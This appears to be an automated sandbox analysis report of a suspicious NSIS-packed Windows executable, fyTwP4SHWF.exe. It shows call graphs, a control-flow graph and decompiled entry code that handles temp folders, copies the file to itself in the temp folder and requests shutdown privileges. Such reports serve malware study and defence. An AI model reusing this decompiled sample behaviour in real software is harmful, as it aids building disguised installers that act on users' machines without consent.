4703 402434 4704 402467 4703->4704 4705 40243c 4703->4705 4707 402da6 17 API calls 4704->4707 4706 402de6 17 API calls 4705->4706 4708 402443 4706->4708 4709 40246e 4707->4709 4711 402da6 17 API calls 4708->4711 4712 40247b 4708->4712 4714 402e64 4709->4714 4713 402454 RegDeleteValueW RegCloseKey 4711->4713 4713->4712 4715 402e78 4714->4715 4717 402e71 4714->4717 4715->4717 4718 402ea9 4715->4718 4717->4712 4719 4064d5 RegOpenKeyExW 4718->4719 4720 402ed7 4719->4720 4721 402ee7 RegEnumValueW 4720->4721 4722 402f0a 4720->4722 4729 402f81 4720->4729 4721->4722 4723 402f71 RegCloseKey 4721->4723 4722->4723 4724 402f46 RegEnumKeyW 4722->4724 4725 402f4f RegCloseKey 4722->4725 4727 402ea9 6 API calls 4722->4727 4723->4729 4724->4722 4724->4725 4726 406a35 5 API calls 4725->4726 4728 402f5f 4726->4728 4727->4722 4728->4729 4730 402f63 RegDeleteKeyW 4728->4730 4729->4717 4730->4729 4731 401735 4732 402da6 17 API calls 4731->4732 4733 40173c SearchPathW 4732->4733 4734 401757 4733->4734 4735 404ab5 4736 404ae1 4735->4736 4737 404af2 4735->4737 4796 405cac GetDlgItemTextW 4736->4796 4739 404afe GetDlgItem 4737->4739 4745 404b5d 4737->4745 4741 404b12 4739->4741 4740 404aec 4743 4068ef 5 API calls 4740->4743 4744 404b26 SetWindowTextW 4741->4744 4752 405fe2 4 API calls 4741->4752 4742 404c41 4746 404df0 4742->4746 4798 405cac GetDlgItemTextW 4742->4798 4743->4737 4748 4045c4 18 API calls 4744->4748 4745->4742 4745->4746 4749 4066a5 17 API calls 4745->4749 4751 40462b 8 API calls 4746->4751 4753 404b42 4748->4753 4754 404bd1 SHBrowseForFolderW 4749->4754 4750 404c71 4755 40603f 18 API calls 4750->4755 4756 404e04 4751->4756 4757 404b1c 4752->4757 4758 4045c4 18 API calls 4753->4758 4754->4742 4759 404be9 CoTaskMemFree 4754->4759 4760 404c77 4755->4760 4757->4744 4763 405f37 3 API calls 4757->4763 4761 404b50 4758->4761 4762 405f37 3 API calls 4759->4762 4799 406668 lstrcpynW 4760->4799 4797 4045f9 SendMessageW 4761->4797 4765 404bf6 4762->4765 4763->4744 4768 404c2d SetDlgItemTextW 4765->4768 4772 4066a5 17 API calls 4765->4772 4767 404b56 4770 406a35 5 API calls 4767->4770 4768->4742 4769 404c8e 4771 406a35 5 API calls 4769->4771 4770->4745 4779 404c95 4771->4779 4773 404c15 lstrcmpiW 4772->4773 4773->4768 4776 404c26 lstrcatW 4773->4776 4774 404cd6 4800 406668 lstrcpynW 4774->4800 4776->4768 4777 404cdd 4778 405fe2 4 API calls 4777->4778 4780 404ce3 GetDiskFreeSpaceW 4778->4780 4779->4774 4782 405f83 2 API calls 4779->4782 4784 404d2e 4779->4784 4783 404d07 MulDiv 4780->4783 4780->4784 4782->4779 4783->4784 4785 404d9f 4784->4785 4786 404f3a 20 API calls 4784->4786 4787 404dc2 4785->4787 4789 40140b 2 API calls 4785->4789 4788 404d8c 4786->4788 4801 4045e6 EnableWindow 4787->4801 4791 404da1 SetDlgItemTextW 4788->4791 4792 404d91 4788->4792 4789->4787 4791->4785 4794 404e71 20 API calls 4792->4794 4793 404dde 4793->4746 4795 404a0e SendMessageW 4793->4795 4794->4785 4795->4746 4796->4740 4797->4767 4798->4750 4799->4769 4800->4777 4801->4793 4802 401d38 4803 402d84 17 API calls 4802->4803 4804 401d3f 4803->4804 4805 402d84 17 API calls 4804->4805 4806 401d4b GetDlgItem 4805->4806 4807 402638 4806->4807 4808 4014b8 4809 4014be 4808->4809 4810 401389 2 API calls 4809->4810 4811 4014c6 4810->4811 4812 40563e 4813 405662 4812->4813 4814 40564e 4812->4814 4817 40566a IsWindowVisible 4813->4817 4823 405681 4813->4823 4815 405654 4814->4815 4816 4056ab 4814->4816 4819 404610 SendMessageW 4815->4819 4818 4056b0 CallWindowProcW 4816->4818 4817->4816 4820 405677 4817->4820 4821 40565e 4818->4821 4819->4821 4822 404f7f 5 API calls 4820->4822 4822->4823 4823->4818 4824 404fff 4 API calls 4823->4824 4824->4816 4825 40263e 4826 402652 4825->4826 4827 40266d 4825->4827 4828 402d84 17 API calls 4826->4828 4829 402672 4827->4829 4830 40269d 4827->4830 4837 402659 4828->4837 4831 402da6 17 API calls 4829->4831 4832 402da6 17 API calls 4830->4832 4834 402679 4831->4834 4833 4026a4 lstrlenW 4832->4833 4833->4837 4842 40668a WideCharToMultiByte 4834->4842 4836 40268d lstrlenA 4836->4837 4838 4026d1 4837->4838 4839 4026e7 4837->4839 4841 406239 5 API calls 4837->4841 4838->4839 4840 40620a WriteFile 4838->4840 4840->4839 4841->4838 4842->4836

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                      C-Code - Quality: 78%
                      			_entry_() {
                      				WCHAR* _v8;
                      				signed int _v12;
                      				void* _v16;
                      				signed int _v20;
                      				int _v24;
                      				int _v28;
                      				struct _TOKEN_PRIVILEGES _v40;
                      				signed char _v42;
                      				int _v44;
                      				signed int _v48;
                      				intOrPtr _v278;
                      				signed short _v310;
                      				struct _OSVERSIONINFOW _v324;
                      				struct _SHFILEINFOW _v1016;
                      				intOrPtr* _t88;
                      				WCHAR* _t92;
                      				char* _t94;
                      				void _t97;
                      				void* _t116;
                      				WCHAR* _t118;
                      				signed int _t119;
                      				intOrPtr* _t123;
                      				void* _t137;
                      				void* _t143;
                      				void* _t148;
                      				void* _t152;
                      				void* _t157;
                      				signed int _t167;
                      				void* _t170;
                      				void* _t175;
                      				intOrPtr _t177;
                      				intOrPtr _t178;
                      				intOrPtr* _t179;
                      				int _t188;
                      				void* _t189;
                      				void* _t198;
                      				signed int _t204;
                      				signed int _t209;
                      				signed int _t214;
                      				signed int _t216;
                      				int* _t218;
                      				signed int _t226;
                      				signed int _t229;
                      				CHAR* _t231;
                      				char* _t232;
                      				signed int _t233;
                      				WCHAR* _t234;
                      				void* _t250;
                      
                      				_t216 = 0x20;
                      				_t188 = 0;
                      				_v24 = 0;
                      				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                      				_v20 = 0;
                      				SetErrorMode(0x8001); // executed
                      				_v324.szCSDVersion = 0;
                      				_v48 = 0;
                      				_v44 = 0;
                      				_v324.dwOSVersionInfoSize = 0x11c;
                      				if(GetVersionExW( &_v324) == 0) {
                      					_v324.dwOSVersionInfoSize = 0x114;
                      					GetVersionExW( &_v324);
                      					asm("sbb eax, eax");
                      					_v42 = 4;
                      					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                      				}
                      				if(_v324.dwMajorVersion < 0xa) {
                      					_v310 = _v310 & 0x00000000;
                      				}
                      				 *0x42a318 = _v324.dwBuildNumber;
                      				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                      				if( *0x42a31e != 0x600) {
                      					_t179 = E00406A35(_t188);
                      					if(_t179 != _t188) {
                      						 *_t179(0xc00);
                      					}
                      				}
                      				_t231 = "UXTHEME";
                      				do {
                      					E004069C5(_t231); // executed
                      					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                      				} while ( *_t231 != 0);
                      				E00406A35(0xb);
                      				 *0x42a264 = E00406A35(9);
                      				_t88 = E00406A35(7);
                      				if(_t88 != _t188) {
                      					_t88 =  *_t88(0x1e);
                      					if(_t88 != 0) {
                      						 *0x42a31c =  *0x42a31c | 0x00000080;
                      					}
                      				}
                      				__imp__#17();
                      				__imp__OleInitialize(_t188); // executed
                      				 *0x42a320 = _t88;
                      				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                      				E00406668(0x429260, L"NSIS Error");
                      				_t92 = GetCommandLineW();
                      				_t232 = L"\"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe\"";
                      				E00406668(_t232, _t92);
                      				_t94 = _t232;
                      				_t233 = 0x22;
                      				 *0x42a260 = 0x400000;
                      				_t250 = L"\"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe\"" - _t233; // 0x22
                      				if(_t250 == 0) {
                      					_t216 = _t233;
                      					_t94 =  &M00435002;
                      				}
                      				_t198 = CharNextW(E00405F64(_t94, _t216));
                      				_v16 = _t198;
                      				while(1) {
                      					_t97 =  *_t198;
                      					_t251 = _t97 - _t188;
                      					if(_t97 == _t188) {
                      						break;
                      					}
                      					_t209 = 0x20;
                      					__eflags = _t97 - _t209;
                      					if(_t97 != _t209) {
                      						L17:
                      						__eflags =  *_t198 - _t233;
                      						_v12 = _t209;
                      						if( *_t198 == _t233) {
                      							_v12 = _t233;
                      							_t198 = _t198 + 2;
                      							__eflags = _t198;
                      						}
                      						__eflags =  *_t198 - 0x2f;
                      						if( *_t198 != 0x2f) {
                      							L32:
                      							_t198 = E00405F64(_t198, _v12);
                      							__eflags =  *_t198 - _t233;
                      							if(__eflags == 0) {
                      								_t198 = _t198 + 2;
                      								__eflags = _t198;
                      							}
                      							continue;
                      						} else {
                      							_t198 = _t198 + 2;
                      							__eflags =  *_t198 - 0x53;
                      							if( *_t198 != 0x53) {
                      								L24:
                      								asm("cdq");
                      								asm("cdq");
                      								_t214 = L"NCRC" & 0x0000ffff;
                      								asm("cdq");
                      								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                      								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                      								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                      									L29:
                      									asm("cdq");
                      									asm("cdq");
                      									_t209 = L" /D=" & 0x0000ffff;
                      									asm("cdq");
                      									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                      									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                      									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                      										L31:
                      										_t233 = 0x22;
                      										goto L32;
                      									}
                      									__eflags =  *_t198 - _t229;
                      									if( *_t198 == _t229) {
                      										 *(_t198 - 4) = _t188;
                      										__eflags = _t198;
                      										E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t198);
                      										L37:
                      										_t234 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
                      										GetTempPathW(0x400, _t234);
                      										_t116 = E0040360F(_t198, _t251);
                      										_t252 = _t116;
                      										if(_t116 != 0) {
                      											L40:
                      											DeleteFileW(L"1033"); // executed
                      											_t118 = E004030D0(_t254, _v20); // executed
                      											_v8 = _t118;
                      											if(_t118 != _t188) {
                      												L68:
                      												ExitProcess(); // executed
                      												__imp__OleUninitialize(); // executed
                      												if(_v8 == _t188) {
                      													if( *0x42a2f4 == _t188) {
                      														L77:
                      														_t119 =  *0x42a30c;
                      														if(_t119 != 0xffffffff) {
                      															_v24 = _t119;
                      														}
                      														ExitProcess(_v24);
                      													}
                      													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                      														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                      														_v40.PrivilegeCount = 1;
                      														_v28 = 2;
                      														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                      													}
                      													_t123 = E00406A35(4);
                      													if(_t123 == _t188) {
                      														L75:
                      														if(ExitWindowsEx(2, 0x80040002) != 0) {
                      															goto L77;
                      														}
                      														goto L76;
                      													} else {
                      														_push(0x80040002);
                      														_push(0x25);
                      														_push(_t188);
                      														_push(_t188);
                      														_push(_t188);
                      														if( *_t123() == 0) {
                      															L76:
                      															E0040140B(9);
                      															goto L77;
                      														}
                      														goto L75;
                      													}
                      												}
                      												E00405CC8(_v8, 0x200010);
                      												ExitProcess(2);
                      											}
                      											if( *0x42a27c == _t188) {
                      												L51:
                      												 *0x42a30c =  *0x42a30c | 0xffffffff;
                      												_v24 = E00403D17(_t264);
                      												goto L68;
                      											}
                      											_t218 = E00405F64(L"\"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe\"", _t188);
                      											if(_t218 < L"\"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe\"") {
                      												L48:
                      												_t263 = _t218 - L"\"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe\"";
                      												_v8 = L"Error launching installer";
                      												if(_t218 < L"\"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe\"") {
                      													_t189 = E00405C33(__eflags);
                      													lstrcatW(_t234, L"~nsu");
                      													__eflags = _t189;
                      													if(_t189 != 0) {
                      														lstrcatW(_t234, "A");
                      													}
                      													lstrcatW(_t234, L".tmp");
                      													_t219 = L"C:\\Users\\frontdesk\\Desktop";
                      													_t137 = lstrcmpiW(_t234, L"C:\\Users\\frontdesk\\Desktop");
                      													__eflags = _t137;
                      													if(_t137 == 0) {
                      														L67:
                      														_t188 = 0;
                      														__eflags = 0;
                      														goto L68;
                      													} else {
                      														__eflags = _t189;
                      														_push(_t234);
                      														if(_t189 == 0) {
                      															E00405C16();
                      														} else {
                      															E00405B99();
                      														}
                      														SetCurrentDirectoryW(_t234);
                      														__eflags = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
                      														if(__eflags == 0) {
                      															E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t219);
                      														}
                      														E00406668(0x42b000, _v16);
                      														_t201 = "A" & 0x0000ffff;
                      														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                      														__eflags = _t143;
                      														_v12 = 0x1a;
                      														 *0x42b800 = _t143;
                      														do {
                      															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                      															DeleteFileW(0x420f08);
                      															__eflags = _v8;
                      															if(_v8 != 0) {
                      																_t148 = CopyFileW(L"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe", 0x420f08, 1);
                      																__eflags = _t148;
                      																if(_t148 != 0) {
                      																	E00406428(_t201, 0x420f08, 0);
                      																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                      																	_t152 = E00405C4B(0x420f08);
                      																	__eflags = _t152;
                      																	if(_t152 != 0) {
                      																		CloseHandle(_t152);
                      																		_v8 = 0;
                      																	}
                      																}
                      															}
                      															 *0x42b800 =  *0x42b800 + 1;
                      															_t61 =  &_v12;
                      															 *_t61 = _v12 - 1;
                      															__eflags =  *_t61;
                      														} while ( *_t61 != 0);
                      														E00406428(_t201, _t234, 0);
                      														goto L67;
                      													}
                      												}
                      												 *_t218 = _t188;
                      												_t221 =  &(_t218[2]);
                      												_t157 = E0040603F(_t263,  &(_t218[2]));
                      												_t264 = _t157;
                      												if(_t157 == 0) {
                      													goto L68;
                      												}
                      												E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t221);
                      												E00406668(L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t221);
                      												_v8 = _t188;
                      												goto L51;
                      											}
                      											asm("cdq");
                      											asm("cdq");
                      											asm("cdq");
                      											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                      											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                      											while( *_t218 != _t204 || _t218[1] != _t167) {
                      												_t218 = _t218;
                      												if(_t218 >= L"\"C:\\Users\\frontdesk\\Desktop\\fyTwP4SHWF.exe\"") {
                      													continue;
                      												}
                      												break;
                      											}
                      											_t188 = 0;
                      											goto L48;
                      										}
                      										GetWindowsDirectoryW(_t234, 0x3fb);
                      										lstrcatW(_t234, L"\\Temp");
                      										_t170 = E0040360F(_t198, _t252);
                      										_t253 = _t170;
                      										if(_t170 != 0) {
                      											goto L40;
                      										}
                      										GetTempPathW(0x3fc, _t234);
                      										lstrcatW(_t234, L"Low");
                      										SetEnvironmentVariableW(L"TEMP", _t234);
                      										SetEnvironmentVariableW(L"TMP", _t234);
                      										_t175 = E0040360F(_t198, _t253);
                      										_t254 = _t175;
                      										if(_t175 == 0) {
                      											goto L68;
                      										}
                      										goto L40;
                      									}
                      									goto L31;
                      								}
                      								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                      								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                      									goto L29;
                      								}
                      								_t177 =  *((intOrPtr*)(_t198 + 8));
                      								__eflags = _t177 - 0x20;
                      								if(_t177 == 0x20) {
                      									L28:
                      									_t36 =  &_v20;
                      									 *_t36 = _v20 | 0x00000004;
                      									__eflags =  *_t36;
                      									goto L29;
                      								}
                      								__eflags = _t177 - _t188;
                      								if(_t177 != _t188) {
                      									goto L29;
                      								}
                      								goto L28;
                      							}
                      							_t178 =  *((intOrPtr*)(_t198 + 2));
                      							__eflags = _t178 - _t209;
                      							if(_t178 == _t209) {
                      								L23:
                      								 *0x42a300 = 1;
                      								goto L24;
                      							}
                      							__eflags = _t178 - _t188;
                      							if(_t178 != _t188) {
                      								goto L24;
                      							}
                      							goto L23;
                      						}
                      					} else {
                      						goto L16;
                      					}
                      					do {
                      						L16:
                      						_t198 = _t198 + 2;
                      						__eflags =  *_t198 - _t209;
                      					} while ( *_t198 == _t209);
                      					goto L17;
                      				}
                      				goto L37;
                      			}



















































                      0x0040364e
                      0x0040364f
                      0x00403656
                      0x00403659
                      0x00403660
                      0x00403663
                      0x00403676
                      0x0040367c
                      0x0040367f
                      0x00403682
                      0x00403690
                      0x00403698
                      0x004036a3
                      0x004036bc
                      0x004036be
                      0x004036c6
                      0x004036c6
                      0x004036d1
                      0x004036d3
                      0x004036d3
                      0x004036e8
                      0x0040370d
                      0x0040371b
                      0x0040371e
                      0x00403725
                      0x0040372c
                      0x0040372c
                      0x00403725
                      0x0040372e
                      0x00403733
                      0x00403734
                      0x00403740
                      0x00403744
                      0x0040374b
                      0x00403759
                      0x0040375e
                      0x00403765
                      0x00403769
                      0x0040376d
                      0x0040376f
                      0x0040376f
                      0x0040376d
                      0x00403776
                      0x0040377d
                      0x00403783
                      0x0040379b
                      0x004037ab
                      0x004037b0
                      0x004037b6
                      0x004037bd
                      0x004037c4
                      0x004037c6
                      0x004037c7
                      0x004037d1
                      0x004037d8
                      0x004037da
                      0x004037dc
                      0x004037dc
                      0x004037ef
                      0x004037f1
                      0x004038eb
                      0x004038eb
                      0x004038ee
                      0x004038f1
                      0x00000000
                      0x00000000
                      0x004037fb
                      0x004037fc
                      0x004037ff
                      0x00403808
                      0x00403808
                      0x0040380b
                      0x0040380e
                      0x00403811
                      0x00403814
                      0x00403814
                      0x00403814
                      0x00403815
                      0x00403819
                      0x004038d9
                      0x004038e2
                      0x004038e4
                      0x004038e7
                      0x004038ea
                      0x004038ea
                      0x004038ea
                      0x00000000
                      0x0040381f
                      0x00403820
                      0x00403821
                      0x00403825
                      0x0040383f
                      0x00403846
                      0x00403859
                      0x0040385a
                      0x0040386f
                      0x00403874
                      0x00403876
                      0x00403878
                      0x00403894
                      0x0040389b
                      0x004038ae
                      0x004038af
                      0x004038c4
                      0x004038ca
                      0x004038cc
                      0x004038ce
                      0x004038d6
                      0x004038d8
                      0x00000000
                      0x004038d8
                      0x004038d2
                      0x004038d4
                      0x004038f9
                      0x004038fd
                      0x00403906
                      0x0040390b
                      0x00403911
                      0x0040391c
                      0x0040391e
                      0x00403923
                      0x00403925
                      0x0040397d
                      0x00403982
                      0x0040398b
                      0x00403992
                      0x00403995
                      0x00403b6c
                      0x00403b6c
                      0x00403b71
                      0x00403b7a
                      0x00403b97
                      0x00403c0f
                      0x00403c0f
                      0x00403c17
                      0x00403c19
                      0x00403c19
                      0x00403c1f
                      0x00403c1f
                      0x00403bae
                      0x00403bba
                      0x00403bcb
                      0x00403bd2
                      0x00403bd9
                      0x00403bd9
                      0x00403be1
                      0x00403bed
                      0x00403bfb
                      0x00403c06
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403bef
                      0x00403bef
                      0x00403bf0
                      0x00403bf2
                      0x00403bf3
                      0x00403bf4
                      0x00403bf9
                      0x00403c08
                      0x00403c0a
                      0x00000000
                      0x00403c0a
                      0x00000000
                      0x00403bf9
                      0x00403bed
                      0x00403b84
                      0x00403b8b
                      0x00403b8b
                      0x004039a1
                      0x00403a48
                      0x00403a48
                      0x00403a54
                      0x00000000
                      0x00403a54
                      0x004039b2
                      0x004039ba
                      0x00403a0c
                      0x00403a0c
                      0x00403a12
                      0x00403a19
                      0x00403a67
                      0x00403a69
                      0x00403a6e
                      0x00403a70
                      0x00403a78
                      0x00403a78
                      0x00403a83
                      0x00403a88
                      0x00403a8f
                      0x00403a95
                      0x00403a97
                      0x00403b6a
                      0x00403b6a
                      0x00403b6a
                      0x00000000
                      0x00403a9d
                      0x00403a9d
                      0x00403a9f
                      0x00403aa0
                      0x00403aa9
                      0x00403aa2
                      0x00403aa2
                      0x00403aa2
                      0x00403aaf
                      0x00403ab7
                      0x00403abe
                      0x00403ac6
                      0x00403ac6
                      0x00403ad3
                      0x00403adf
                      0x00403ae9
                      0x00403ae9
                      0x00403aeb
                      0x00403af2
                      0x00403afc
                      0x00403b08
                      0x00403b0e
                      0x00403b14
                      0x00403b17
                      0x00403b21
                      0x00403b27
                      0x00403b29
                      0x00403b2d
                      0x00403b3e
                      0x00403b44
                      0x00403b49
                      0x00403b4b
                      0x00403b4e
                      0x00403b54
                      0x00403b54
                      0x00403b4b
                      0x00403b29
                      0x00403b57
                      0x00403b5e
                      0x00403b5e
                      0x00403b5e
                      0x00403b5e
                      0x00403b65
                      0x00000000
                      0x00403b65
                      0x00403a97
                      0x00403a1b
                      0x00403a1e
                      0x00403a22
                      0x00403a27
                      0x00403a29
                      0x00000000
                      0x00000000
                      0x00403a35
                      0x00403a40
                      0x00403a45
                      0x00000000
                      0x00403a45
                      0x004039c3
                      0x004039db
                      0x004039ec
                      0x004039ed
                      0x004039f1
                      0x004039f3
                      0x00403a01
                      0x00403a08
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403a08
                      0x00403a0a
                      0x00000000
                      0x00403a0a
                      0x0040392d
                      0x00403939
                      0x0040393e
                      0x00403943
                      0x00403945
                      0x00000000
                      0x00000000
                      0x0040394d
                      0x00403955
                      0x00403966
                      0x0040396e
                      0x00403970
                      0x00403975
                      0x00403977
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403977
                      0x00000000
                      0x004038d4
                      0x0040387d
                      0x0040387f
                      0x00000000
                      0x00000000
                      0x00403881
                      0x00403885
                      0x00403889
                      0x00403890
                      0x00403890
                      0x00403890
                      0x00403890
                      0x00000000
                      0x00403890
                      0x0040388b
                      0x0040388e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040388e
                      0x00403827
                      0x0040382b
                      0x0040382e
                      0x00403835
                      0x00403835
                      0x00000000
                      0x00403835
                      0x00403830
                      0x00403833
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403833
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403801
                      0x00403801
                      0x00403802
                      0x00403803
                      0x00403803
                      0x00000000
                      0x00403801
                      0x00000000

                      APIs
                      • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                      • GetVersionExW.KERNEL32(?), ref: 0040368C
                      • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                      • OleInitialize.OLE32(00000000), ref: 0040377D
                      • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                      • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\fyTwP4SHWF.exe",00000020,"C:\Users\user\Desktop\fyTwP4SHWF.exe",00000000), ref: 004037E9
                      • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 0040391C
                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040392D
                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403939
                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040394D
                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403955
                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403966
                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040396E
                      • DeleteFileW.KERNELBASE(1033), ref: 00403982
                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403A69
                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328), ref: 00403A78
                        • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405C1C
                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 00403A83
                      • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fyTwP4SHWF.exe",00000000,?), ref: 00403A8F
                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403AAF
